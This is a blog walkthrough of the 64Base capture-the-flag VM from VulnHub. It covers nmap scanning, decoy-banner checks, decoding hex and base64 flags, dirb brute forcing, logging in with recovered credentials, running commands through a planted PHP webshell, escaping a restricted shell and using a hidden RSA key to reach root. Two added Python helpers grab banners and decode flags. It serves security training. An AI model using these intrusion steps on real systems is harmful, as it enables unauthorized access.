VM - Cracking 64Base_3mrgnc3

Posted by 青蛙愛輪滑 on 2019-03-04

This post records my walkthrough of 64Base_3mrgnc3; the test VM comes from www.vulnhub.com
Series: CTF-oriented VM cracking
Download link: 64Base_3mrgnc3

  1. Put the target VM and Kali on the same network segment, then find the target's IP with netdiscover

     root@kali:~# netdiscover -r 10.10.10.0/24
      Currently scanning: Finished!   |   Screen View: Unique Hosts
     
      4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
      _____________________________________________________________________________
        IP            At MAC Address     Count     Len  MAC Vendor / Hostname
      -----------------------------------------------------------------------------
      10.10.10.1      00:50:56:c0:00:08      1      60  VMware, Inc.
      10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.
      10.10.10.154    00:0c:29:60:fd:07      1      60  VMware, Inc.
      10.10.10.254    00:50:56:fe:24:e8      1      60  VMware, Inc.
    
  2. The target is 10.10.10.154. Next, scan all TCP ports with nmap

     root@kali:~# nmap  10.10.10.154 -p 1-65535 -sT -T4
     Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 10:37 EST
     Nmap scan report for 10.10.10.154
     Host is up (0.0010s latency).
     Not shown: 65531 closed ports
     PORT      STATE SERVICE
     22/tcp    open  ssh
     80/tcp    open  http
     4899/tcp  open  radmin
     62964/tcp open  unknown
     MAC Address: 00:0C:29:60:FD:07 (VMware)
    

    Ports 22, 80, 4899 and 62964 are open. Note that -sT without -sV labels services by port number only, so the SERVICE column above is a lookup, not a detection; a quick way to see what actually answers on a port is nc or telnet

     root@kali:~# telnet 10.10.10.154 22
     Trying 10.10.10.154...
     Connected to 10.10.10.154.
     Escape character is '^]'.
     The programs included with the Fedora GNU/Linux system are free software;
     the exact distribution terms for each program are described in the
     individual files in /usr/share/doc/*/copyright.
     
     Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
     permitted by applicable law.
     Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001
     
     #
    

    The text claims the last login was in the year 4025 from 010.101.010.001, which is obviously fake. More to the point, a real SSH server sends an identification string beginning with SSH-2.0- before anything else; this port just prints a fake MOTD, so whatever it is, it is not SSH. Next, port 80

     root@kali:~# nc -nv 10.10.10.154 80
     (UNKNOWN) [10.10.10.154] 80 (http) open
     HEAD / HTTP/1.0
     
     HTTP/1.1 200 OK
     Date: Mon, 25 Feb 2019 05:22:02 GMT
     Server: Apache/2.4.10 (Debian)
     Last-Modified: Tue, 06 Dec 2016 05:33:14 GMT
     ETag: "1fdf-542f6bd9b68a0"
     Accept-Ranges: bytes
     Content-Length: 8159
     Vary: Accept-Encoding
     Connection: close
     Content-Type: text/html
    

    This is a normal Apache web server; the Server header says Debian, which contradicts the "Fedora" text on port 22 and confirms that banner was a decoy. Next, port 4899

     root@kali:~# nc -nv 10.10.10.154 4899
     (UNKNOWN) [10.10.10.154] 4899 (radmin-port) open
     sshhh! ssh! droids!
     
     
     
     
     
     So..
     
     You found a way in then...
     
     but, can you pop root?
     
     
     
                                                /~\
                                               |oo )    Did you hear that?
                                               _\=/_
                               ___            /  _  \
                              / ()\          //|/.\|\\
                            _|_____|_        \\ \_/  ||
                           | | === | |        \|\ /| ||
                           |_|  O  |_|        # _ _/ #
                            ||  O  ||          | | |
                            ||__*__||          | | |
                           |~ \___/ ~|         []|[]
                           /=\ /=\ /=\         | | |
           ________________[_]_[_]_[_]________/_]_[_\_________________________
    

    The response contains a long run of blank lines, so the first line scrolls off the screen; it reads sshhh! ssh! droids!. Despite the wording, this is not an SSH port either. Next, port 62964

     root@kali:~# nc -nv 10.10.10.154 62964
     (UNKNOWN) [10.10.10.154] 62964 (?) open
     SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
    

    This one sends a proper SSH identification string, so it is the real SSH port
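    The banner check in step 2 can be automated. The script below is an added example and not part of the original post: it connects to the four ports nmap reported, reads whatever the service sends first, and classifies it by the protocol handshake rather than by port number. A real SSH server must send an identification string starting with "SSH-" before anything else (RFC 4253, section 4.2), so a port that prints a fake MOTD or ASCII art is not SSH whatever nmap's port-number lookup calls it. The target address is taken from the walkthrough and is an assumption for your own lab; the classifier can be exercised offline on the banners shown above.

```python
"""Banner grabbing that trusts the handshake, not the port number.

Added example for this walkthrough (not code from the original post).
"""
import socket

# Assumption: the target and ports from the walkthrough's nmap output.
TARGET = "10.10.10.154"
PORTS = [22, 80, 4899, 62964]


def classify_banner(data: bytes) -> str:
    """Classify the first bytes a service sends right after connect."""
    head = data.lstrip()
    if head.startswith(b"SSH-"):
        # RFC 4253: "SSH-protoversion-softwareversion SP comments CR LF"
        return "ssh"
    if head.startswith(b"HTTP/"):
        return "http"
    if not head:
        # Client-speaks-first protocols (HTTP without a request) stay silent
        return "silent"
    # MOTD text, ASCII art, anything else: the port is lying about itself
    return "decoy/unknown"


def ssh_software_version(banner: bytes) -> str:
    """Return the softwareversion field of an SSH identification string, or ''."""
    line = banner.lstrip().split(b"\n", 1)[0].rstrip(b"\r")
    if not line.startswith(b"SSH-"):
        return ""
    parts = line.split(b"-", 2)  # SSH / protoversion / softwareversion [SP comments]
    return parts[2].decode("ascii", "replace") if len(parts) == 3 else ""


def grab_banner(host: str, port: int, timeout: float = 3.0) -> bytes:
    """Connect, wait for the server to speak first, return what it sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(4096)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    for port in PORTS:
        try:
            banner = grab_banner(TARGET, port)
        except OSError as e:
            print(f"{port}: connect failed: {e}")
            continue
        kind = classify_banner(banner)
        detail = f" ({ssh_software_version(banner)})" if kind == "ssh" else ""
        first = banner.splitlines()[0][:60] if banner else b""
        print(f"{port}: {kind}{detail}  first line: {first!r}")
```

    On this box the script reports 22 and 4899 as decoys, 80 as silent (HTTP waits for a request), and 62964 as ssh with software version OpenSSH_6.7p1 Debian-5+deb8u3; nmap -sV would have reached the same conclusion.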

  3. A closer look at the web site on port 80

    Open http://10.10.10.154 in a browser to see the home page

    The page shows a string of apparently random characters, which is base64

     root@kali:~# echo dmlldyBzb3VyY2UgO0QK | base64 --decode
     view source ;D
    

    Following the hint, view the page source

    The source contains the string 5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a
    Its alphabet is only 0-9 and a-f, so it is hex rather than base64. Decoding the hex yields a base64 string, so decode that as well

     root@kali:~# echo 5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a | xxd -p -r | base64 --decode
     flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
    

    This yields flag1: flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}

    Decode the contents of flag1:

     root@kali:~# echo NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==| base64 --decode
     64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
    

    Browsing the other tabs of the site, the post page holds several hints, including the image at the bottom.

    The image says:

    IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377.

    And the comment below it says:

    Only respond if you are a real Imperial-Class BountyHunter

  4. Nothing else of value is visible on the home page, so move on to enumeration and brute forcing

    Enumerate the site with nikto

     root@kali:~# nikto -host http://10.10.10.154
     - Nikto v2.1.6
     ---------------------------------------------------------------------------
     + Target IP:          10.10.10.154
     + Target Hostname:    10.10.10.154
     + Target Port:        80
     + Start Time:         2019-03-03 09:13:59 (GMT-5)
     ---------------------------------------------------------------------------
     + Server: Apache/2.4.10 (Debian)
     
     + "robots.txt" contains 429 entries which should be manually viewed.
     + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
     + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
     + OSVDB-3268: /img/: Directory indexing found.
     + OSVDB-3092: /img/: This might be interesting...
     + OSVDB-3268: /mail/: Directory indexing found.
     + OSVDB-3092: /mail/: This might be interesting...
     + OSVDB-3092: /members/: This might be interesting...
     + OSVDB-3092: /order/: This might be interesting...
     + OSVDB-3092: /staff/: This might be interesting...
     + OSVDB-3092: /manual/: Web server manual found.
     + OSVDB-3268: /manual/images/: Directory indexing found.
     + OSVDB-3233: /icons/README: Apache default file found.
     + OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
     + OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
     + OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
     + OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
     + OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
     + 8079 requests: 0 error(s) and 434 item(s) reported on remote host
     + End Time:           2019-03-03 09:14:21 (GMT-5) (22 seconds)
     ---------------------------------------------------------------------------
     + 1 host(s) tested
     root@kali:~#
    

    nikto flags an unusually large robots.txt:

    "robots.txt" contains 429 entries which should be manually viewed

    A genuine robots.txt does not have 429 entries; this one is padding meant to waste time (the directories nikto listed above are mostly the same decoys). So take another route and brute-force directories. The interesting target is an admin area protected by a password, so keep only responses with status 401 (authentication required)

     root@kali:~# dirb http://10.10.10.154 | grep "CODE:401"
     + http://10.10.10.154/admin (CODE:401|SIZE:459)
    

    Opening it in a browser prompts for a username and password (HTTP Basic authentication)

    Try the value from flag1, which already has the shape user:password (64base:Th353@r3N0TdaDr01DzU@reL00K1ing4)

     root@kali:~# curl -u "64base:Th353@r3N0TdaDr01DzU@reL00K1ing4" -s http://10.10.10.154/admin
     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
     <html><head>
     <title>401 Unauthorized</title>
     </head><body>
     <h1>Unauthorized</h1>
     <p>This server could not verify that you
     are authorized to access the document
     requested.  Either you supplied the wrong
     credentials (e.g., bad password), or your
     browser doesn't understand how to supply
     the credentials required.</p>
     <hr>
     <address>Apache/2.4.10 (Debian) Server at 10.10.10.154 Port 80</address>
     </body></html>
    

    The server rejects it. The next step is brute force, which needs a wordlist; rather than a generic one, we can build it from information on the site itself.

  5. Build a wordlist from the site and brute-force with it

    Recursively mirror the whole blog (robots.txt, HTML and JavaScript) with wget; with -O every fetched file is written into a single output file. html2dic then extracts the words from it, and sort -u dedups them into a usable wordlist.

     root@kali:~# wget http://10.10.10.154 -rq -O base64.out
     root@kali:~# ls -al base64.out
     -rw-r--r-- 1 root root 1869208 Dec 5 2016 base64.out
     root@kali:~# html2dic base64.out | sort -u > base64.dict
     root@kali:~# wc -l base64.dict
     12845 base64.dict

    Use the wordlist as a directory list for dirb, again keeping only 401 responses; the credentials from flag1 may belong to a different protected path than /admin

     root@kali:~# dirb http://10.10.10.154 base64.dict | grep "CODE:401"

    This turns up another protected directory, http://10.10.10.154/Imperial-Class/. Logging in there with 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 succeeds

    View the page source, or fetch it from the command line with the same credentials:

     root@kali:~# curl -u '64base:Th353@r3N0TdaDr01DzU@reL00K1ing4' -s http://10.10.10.154/Imperial-Class/
     <!DOCTYPE html>
     <html lang="en">
     <body bgcolor=#000000><font color=#cfbf00>
     <title>64base - login</title>
     <h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>
     <!-- don't forget the BountyHunter login -->
    

    The HTML comment says not to forget the BountyHunter login. Where would that be?

    Recall the hint under the image on the post page:

    Only respond if you are a real Imperial-Class BountyHunter

    So build the URL:

    http://10.10.10.154/Imperial-Class/BountyHunter/

    This path also requires a login

    Log in with the same credentials. After login the URL changes from http://10.10.10.154/Imperial-Class/BountyHunter/ to http://10.10.10.154/Imperial-Class/BountyHunter/index.php. The page looks the same, but its source is different: it carries an extra line, <!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->, and two id attributes earlier in the source also hold hex strings. Concatenate the three pieces in page order

    Decode the concatenated string the same way as before (hex, then base64)

     root@kali:~# echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -p -r | base64 --decode
     flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
    

    This gives flag2. Decode its contents

     root@kali:~# echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=" | base64 --decode
     https://www.youtube.com/watch?v=vJwytFWA8uA
    

    The title of that video hints at using Burp.

    Burp is not strictly needed; curl captures this flag just as well. login.php returns the flag in the body of a response that also redirects, so a browser follows the redirect and never renders that body, while a proxy like Burp shows the raw response and curl does not follow redirects unless given -L.

     root@kali:~# curl -u '64base:Th353@r3N0TdaDr01DzU@reL00K1ing4' -s http://10.10.10.154/Imperial-Class/BountyHunter/login.php | grep flag|cut -d{ -f2|cut -d} -f1|base64 -d
     53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
    

    The decoded URL takes a function name and a command as parameters, which looks like a webshell

  6. Using the webshell

    Opening http://10.10.10.154/Imperial-Class/BountyHunter/login.php?f=exec&c=id in a browser gives an empty response

    Recall the earlier hint:
    IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377

    The reason is that PHP's exec() hands the command output back to the caller instead of printing it, whereas system() echoes it straight into the response. Change f accordingly:
    http://10.10.10.154/Imperial-Class/BountyHunter/login.php?f=system&c=id
    The response now contains the output of id together with flag4: flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

    Decode flag4:

     root@kali:~# echo "NjRiYXNlOjY0YmFzZTVoMzc3Cg==" | base64 --decode
     64base:64base5h377
    

    Again user:password, 64base:64base5h377. The SSH password is not 64base5h377 itself but its base64 encoding (trailing newline included, since that is what echo produces), so encode it once more

     root@kali:~# echo "64base5h377" | base64
     NjRiYXNlNWgzNzcK
    

    Log in to SSH on port 62964 of 10.10.10.154 with 64base:NjRiYXNlNWgzNzcK

     root@kali:~# ssh 64base@10.10.10.154 -p 62964
     64base@10.10.10.154's password:
     Last login: Tue Dec  6 05:10:28 2016 from 172.16.0.18
     64base@64base:~$
    

    Some commands are not recognized, and others only print an ASCII-art picture: this is a restricted shell (rbash)

     64base@64base:~$ id
     -rbash: id: command not found
     64base@64base:~$ ls
     well_done_:D
     64base@64base:~$ pwd
     /64base
     64base@64base:~$
    

    Further testing shows that find, python, ruby and many other commands do not work as expected, but base64 does

     64base@64base:~$ base64 well_done_:D | base64 --decode
     sshhh! ssh! droids!
    
    
    
    
    
    
    
    
     
     
     
     
     So..
     
     You found a way in then...
     
     but, can you pop root?
     
     
     
                                                /~\
                                               |oo )    Did you hear that?
                                               _\=/_
                               ___            /  _  \
                              / ()\          //|/.\|\\
                            _|_____|_        \\ \_/  ||
                           | | === | |        \|\ /| ||
                           |_|  O  |_|        # _ _/ #
                            ||  O  ||          | | |
                            ||__*__||          | | |
                           |~ \___/ ~|         []|[]
                           /=\ /=\ /=\         | | |
           ________________[_]_[_]_[_]________/_]_[_\_________________________
     
     
     64base@64base:~$ 
    

    env also works, and because the shell expands globs itself, echo $PATH/* lists the contents of the single PATH directory without needing ls

     64base@64base:~$ env
     TERM=xterm
     SHELL=/bin/rbash
     SSH_CLIENT=10.10.10.157 49858 62964
     SSH_TTY=/dev/pts/0
     USER=64base
     
     
     64base@64base:~$ echo $PATH/*
     /var/alt-bin/awk /var/alt-bin/base64 /var/alt-bin/cat /var/alt-bin/droids /var/alt-bin/egrep /var/alt-bin/env /var/alt-bin/fgrep /var/alt-bin/file /var/alt-bin/find /var/alt-bin/grep /var/alt-bin/head /var/alt-bin/less /var/alt-bin/ls /var/alt-bin/more /var/alt-bin/perl /var/alt-bin/python /var/alt-bin/ruby /var/alt-bin/tail
     64base@64base:~$
    

    One entry, /var/alt-bin/droids, is not a standard tool. Run it

     64base@64base:~$ droids
    

  7. After running droids the restriction is gone: PATH now includes the normal directories and commands can be invoked by absolute path, which rbash forbids

     64base@64base:~$ echo $PATH
     /var/alt-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
     
     64base@64base:~$ /bin/ls -la
     total 20
     drwxr-xr-x  2 root root 4096 Dec  6  2016 .
     drwxr-xr-x 22 root root 4096 Dec  6  2016 ..
     -rw-r--r--  1 root root 3602 Dec  6  2016 .bashrc
     -rw-r--r--  1 root root  183 Dec  6  2016 .profile
     ---S---r-x  1 root root  819 Dec  6  2016 well_done_:D
     
     64base@64base:~$ /bin/ls /
     64base  boot  etc   initrd.img  lost+found  mnt  proc  run   srv  tmp  var
     bin     dev   home  lib         media       opt  root  sbin  sys  usr  vmlinuz
    

    Use find to locate flag5

     64base@64base:/var$ /usr/bin/find /var -name flag5*
     /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
     
     64base@64base:/var$ echo TG9vayBJbnNpZGUhIDpECg==|base64 -d
     Look Inside! :D
     
     64base@64base:/var$ file /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
     /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3
    

    file prints only the beginning of the JPEG comment, which is hex; use strings to read the whole thing

     64base@64base:/var$ strings /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==} | /usr/bin/head
     JFIF
     4c5330744c5331435255644a546942535530456755464a4a566b4655525342...
     $Wbr
     %4568CDgt
     &9ESTVcsu
     '7FGdf
     (Uev
     #3Rbr
     mX$S(
     -E=m
     64base@64base:/var$
    

    Decode the hex (hex, then base64)

     64base@64base:/var$ echo "4c5330744c5336e704a5a5646754f48514b4c3064714e477468636b6f7861
     5530355357597a4f57524e4e55396851315a615569395554304a57595649346
     .....................
     .....................
     .....................
     2584a514e315a300a536d39794f57706c53444a305255777764473946635664
     434d56424c4d48565955416f744c5330744c55564f524342535530456755464
     a4a566b46555253424c52566b744c5330744c516f3d0a" | xxd -p -r | base64 --decode
     -----BEGIN RSA PRIVATE KEY-----
     Proc-Type: 4,ENCRYPTED
     DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C
     
     mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
     YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
     8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
     kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
     MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
     k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
     wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
     guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
     TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
     2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
     AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
     4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
     +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
     fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
     +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
     13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
     rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
     Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
     Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
     Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
     Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
     qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
     64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
     fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
     /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
     -----END RSA PRIVATE KEY-----
     64base@64base:/var$
    

    This is a passphrase-protected RSA private key (Proc-Type: 4,ENCRYPTED), presumably for SSH. Write it to a file

     64base@64base:/var$ echo "4c5330744c5336e704a5a5646754f48514b4c3064714e477468636b6f7861
     5530355357597a4f57524e4e55396851315a615569395554304a57595649346
     .....................
     .....................
     .....................
     2584a514e315a300a536d39794f57706c53444a305255777764473946635664
     434d56424c4d48565955416f744c5330744c55564f524342535530456755464
     a4a566b46555253424c52566b744c5330744c516f3d0a"  | xxd -p -r | base64 --decode > /tmp/ssh.key
    
    
     64base@64base:/tmp$ ls
     ssh.key
    

    Try logging in as root with the private key

     64base@64base:/tmp$ ssh root@10.10.10.154 -p 62964 -i /tmp/ssh.key
     Could not create directory '/64base/.ssh'.
     The authenticity of host '[10.10.10.154]:62964 ([10.10.10.154]:62964)' can't be established.
     ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.
     Are you sure you want to continue connecting (yes/no)? yes
     Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
     @         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
     Permissions 0644 for '/tmp/ssh.key' are too open.
     It is recommended that your private key files are NOT accessible by others.
     This private key will be ignored.
     key_load_private_type: bad permissions
     root@10.10.10.154's password:
    
  8. The key was ignored because /tmp/ssh.key is mode 0644; ssh refuses world-readable private keys, so chmod 600 it first. Even then the key is encrypted and ssh asks for a passphrase we do not have yet. flag5 said "Look Inside!", so download the JPEG to Kali and look at it

    Username/password: 64base/NjRiYXNlNWgzNzcK

     root@kali:~# scp -P 62964 64base@10.10.10.154:/var/www/html/admin/S3cR37/flag5* flag5.jpeg
     64base@10.10.10.154's password:
     flag5{TG9vayBJbnNpZGUhIDpECg==}                                                           100%  192KB  46.5MB/s   00:00
     root@kali:~# 
    

    The image contains text: usetheforce

    Use usetheforce as the key's passphrase

     64base@64base:/$ ssh root@127.0.0.1 -p 62964 -i /tmp/ssh.key 
     Could not create directory '/64base/.ssh'.
     The authenticity of host '[127.0.0.1]:62964 ([127.0.0.1]:62964)' can't be established.
     ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.
     Are you sure you want to continue connecting (yes/no)? yes
     Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
     Enter passphrase for key '/tmp/rsa-key': 
     
     Last login: Wed Dec  7 16:27:53 2016 from localhost
     
     flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
     root@64base:~# 
    

    Decode flag6. It is wrapped several times over: base64, hex, base64, hex, base64

     root@kali:~# echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" |base64 -d|xxd -p -r|base64 -d|xxd -p -r|base64 -d
     base64 -d /var/local/.luke|less.real
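
    Every flag on this box (flag1, flag2, flag4, flag6) uses the same few wrappers, hex, base64 and a flagN{...} envelope, stacked in varying order. The script below is an added example, not code from the original post: peel() inspects the alphabet of the current string, applies the matching decoder, and repeats until the result is neither hex nor base64, which is the real payload (a user:password pair, a URL, a shell command). The sample strings are copied from the walkthrough above.

```python
"""Peel the nested hex / base64 / flagN{...} wrappers used on this box.

Added example for this walkthrough, not code from the original post.
"""
import base64
import binascii
import re
import string

FLAG_RE = re.compile(r"^(flag\d+)\{(.*)\}$", re.DOTALL)
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable)

# Strings copied from the walkthrough: the hex hidden in the home page source
# (flag1), flag4 from the webshell, and flag6 printed at the root login.
FLAG1_HEX = "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a"
FLAG4 = "flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}"
FLAG6 = "flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}"


def peel(token, max_layers=16):
    """Return (payload, layers): the innermost text and the decoders applied, outermost first."""
    cur = token.strip()
    layers = []
    for _ in range(max_layers):
        m = FLAG_RE.match(cur)
        if m:
            layers.append(m.group(1))       # the envelope, e.g. "flag1"
            cur = m.group(2).strip()
            continue
        try:
            # Hex is tested first: every hex string is also valid base64
            # alphabet, but not the other way round.
            if len(cur) % 2 == 0 and HEX_RE.match(cur):
                raw, kind = bytes.fromhex(cur), "hex"
            elif len(cur) % 4 == 0 and B64_RE.match(cur):
                raw, kind = base64.b64decode(cur, validate=True), "base64"
            else:
                break                       # not an encoding we know: this is the payload
        except (ValueError, binascii.Error):
            break                           # looked like an encoding but was not
        text = raw.decode("ascii", errors="replace")
        if set(text) - PRINTABLE:
            break                           # decoded to binary (e.g. a JPEG): keep the outer form
        layers.append(kind)
        cur = text.strip()
    return cur, layers


if __name__ == "__main__":
    for name, s in (("flag1 hex", FLAG1_HEX), ("flag4", FLAG4), ("flag6", FLAG6)):
        payload, layers = peel(s)
        print(f"{name}: {' -> '.join(layers)} => {payload!r}")
```

    The stop condition matters more than the decoders: a string such as 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 is rejected by both alphabet checks, which is exactly how you know the loop has reached the payload rather than another wrapper.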
    

    The result is a command, base64 -d /var/local/.luke|less.real. Run it

     64base@64base:/tmp$ base64 -d /var/local/.luke|less.real
       ______  ______  ______  ______  ______  ______  ______  ______
